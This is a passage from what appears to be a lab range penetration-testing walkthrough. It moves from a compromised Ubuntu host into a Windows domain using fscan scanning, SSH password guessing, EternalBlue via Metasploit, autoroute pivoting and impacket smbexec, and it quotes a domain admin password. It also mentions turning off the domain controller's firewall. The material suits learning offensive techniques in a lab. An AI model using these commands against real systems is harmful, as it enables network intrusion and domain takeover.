Chain FORWARD (policy DROP 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
6009 13M DOCKER-USER all -- * * 0.0.0.0/0 0.0.0.0/0
6009 13M DOCKER-ISOLATION-STAGE-1 all -- * * 0.0.0.0/0 0.0.0.0/0
2591 7215K ACCEPT all -- * docker0 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
179 10740 DOCKER all -- * docker0 0.0.0.0/0 0.0.0.0/0
3239 6271K ACCEPT all -- docker0 !docker0 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- docker0 docker0 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- * br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
0 0 DOCKER all -- * br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-05384b1b0df2 !br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-05384b1b0df2 br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- * br-f0d07941b332 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
0 0 DOCKER all -- * br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-f0d07941b332 !br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-f0d07941b332 br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- * br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
0 0 DOCKER all -- * br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-1d665e13ee58 !br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
0 0 ACCEPT all -- br-1d665e13ee58 br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
Chain OUTPUT (policy ACCEPT 2050 packets, 181K bytes)
pkts bytes target prot opt in out source destination
Chain DOCKER (4 references)
pkts bytes target prot opt in out source destination
179 10740 ACCEPT tcp -- !docker0 docker0 0.0.0.0/0 172.17.0.2 tcp dpt:80
Chain DOCKER-ISOLATION-STAGE-1 (1 references)
pkts bytes target prot opt in out source destination
3239 6271K DOCKER-ISOLATION-STAGE-2 all -- docker0 !docker0 0.0.0.0/0 0.0.0.0/0
0 0 DOCKER-ISOLATION-STAGE-2 all -- br-05384b1b0df2 !br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
0 0 DOCKER-ISOLATION-STAGE-2 all -- br-f0d07941b332 !br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
0 0 DOCKER-ISOLATION-STAGE-2 all -- br-1d665e13ee58 !br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
6009 13M RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
Chain DOCKER-ISOLATION-STAGE-2 (4 references)
pkts bytes target prot opt in out source destination
0 0 DROP all -- * docker0 0.0.0.0/0 0.0.0.0/0
0 0 DROP all -- * br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0
0 0 DROP all -- * br-f0d07941b332 0.0.0.0/0 0.0.0.0/0
0 0 DROP all -- * br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0
3239 6271K RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
Chain DOCKER-USER (1 references)
pkts bytes target prot opt in out source destination
6009 13M RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
root@ubuntu:~# ufw status 2>/dev/null
Status: inactive
root@ubuntu:~# nft list ruleset 2>/dev/null
root@ubuntu:~#
```

As can be seen, the host itself has no inbound or outbound restrictions, so go straight to fscan. Upload it through the proxy (the two -o options re-enable ssh-rsa, which the debug line above shows the client no longer offers):

```
proxychains scp -o PubkeyAcceptedAlgorithms=+ssh-rsa -o HostkeyAlgorithms=+ssh-rsa -i target /usr/local/bin/fscan root@192.168.52.20:/tmp/
```

After granting it execute permission, run it:

```
root@ubuntu:/tmp# ./fscan -h 192.168.93.0/24
   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   < 
\____/     |___/\___|_|  \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 192.168.93.10 is alive
(icmp) Target 192.168.93.20 is alive
(icmp) Target 192.168.93.30 is alive
(icmp) Target 192.168.93.40 is alive
[*] Icmp alive hosts len is: 4
192.168.93.10:8000 open
192.168.93.30:88 open
192.168.93.20:8080 open
192.168.93.20:1081 open
192.168.93.20:1080 open
192.168.93.40:445 open
192.168.93.30:445 open
192.168.93.20:445 open
192.168.93.40:139 open
192.168.93.30:139 open
192.168.93.20:139 open
192.168.93.40:135 open
192.168.93.30:135 open
192.168.93.20:135 open
192.168.93.10:22 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo
[*]192.168.93.30
[->]DC
[->]192.168.93.30
[+] MS17-010 192.168.93.30 (Windows Server 2012 R2 Datacenter 9600)
[+] MS17-010 192.168.93.40 (Windows 7 Professional 7601 Service Pack 1)
[*] NetBios 192.168.93.30 [+] DC:DC.whoamianony.org Windows Server 2012 R2 Datacenter 9600
[+] MS17-010 192.168.93.20 (Windows 7 Professional 7601 Service Pack 1)
[*] NetBios 192.168.93.40 PC2.whoamianony.org Windows 7 Professional 7601 Service Pack 1
[*] WebTitle http://192.168.93.20:8080 code:200 len:10065 title:通达OA网络智能办公系统
[+] InfoScan http://192.168.93.20:8080 [通达OA]
[*] WebTitle http://192.168.93.10:8000 code:200 len:17474 title:Laravel
[+] InfoScan http://192.168.93.10:8000 [Laravel]
[+] PocScan http://192.168.93.20:8080 tongda-user-session-disclosure
[+] PocScan http://192.168.93.10:8000 poc-yaml-laravel-cve-2021-3129
已完成 14/15 [-] ssh 192.168.93.10:22 root pass@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 14/15 [-] ssh 192.168.93.10:22 root 1 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 14/15 [-] ssh 192.168.93.10:22 root root111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 14/15 [-] ssh 192.168.93.10:22 root root@2019 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 14/15 [-] ssh 192.168.93.10:22 root 12345678 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 14/15 [-] ssh 192.168.93.10:22 root 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 15/15
[*] 扫描结束,耗时: 7m15.055664472s
```

Much of this is information we had already worked out, but there are two very valuable items:
both range machines in the domain are vulnerable to EternalBlue.

8. Back to EternalBlue
Test 192.168.93.30 (the domain controller) first, exploiting it the same way as before (the method was covered earlier, so the description below is brief).
Create the proxy (note: use a different port this time).
Switch MSF's global proxy to the new one; with that, MSF can reach the domain environment directly.
But it did not succeed after many attempts, so switch to 192.168.93.40, which gives a meterpreter straight away.
Create a route into the domain network:

```
run autoroute -s 192.168.93.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.93.0/255.255.255.0...
[+] Added route to 192.168.93.0/255.255.255.0 via 192.168.93.40
[*] Use the -p option to list all active routes
```

After harvesting credentials, what we get is still just the machine's own account. Very strange.
What comes back is still only MsCacheV2 data.

9. Checking the WP
Looking at the official WP: it simply dumped credentials on 192.168.52.30 and obtained the domain admin's plaintext password (Whoami2021) directly...
Well, that is presumably a problem with the range environment (already reported to 棉花糖).
But that is exactly where the fun of attacking ranges lies.

10. Logging in to the domain controller and getting the flag
So, let's "pretend" we found the domain admin's plaintext password and try logging in directly.
It failed, probably because of a firewall; using the existing session plus the password, we can simply turn off the domain controller's firewall.
Once that is done, try again:

```
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK
[*] Requesting shares on 192.168.93.30.....
[*] Found writable share ADMIN$
[*] Uploading file XDDSTHvz.exe
[*] Opening SVCManager on 192.168.93.30.....
[*] Creating service fqAv on 192.168.93.30.....
[*] Starting service fqAv.....
[proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK
[!] Press help for extra shell commands
[proxychains] Strict chain ... 127.0.0.1:1090 ... 192.168.93.30:445 ... OK
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [�汾 6.3.9600]
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) 2013 Microsoft Corporation����������Ȩ����
C:\Windows\system32>
```

Success; the rest is locating and reading the flag, which I won't go over again.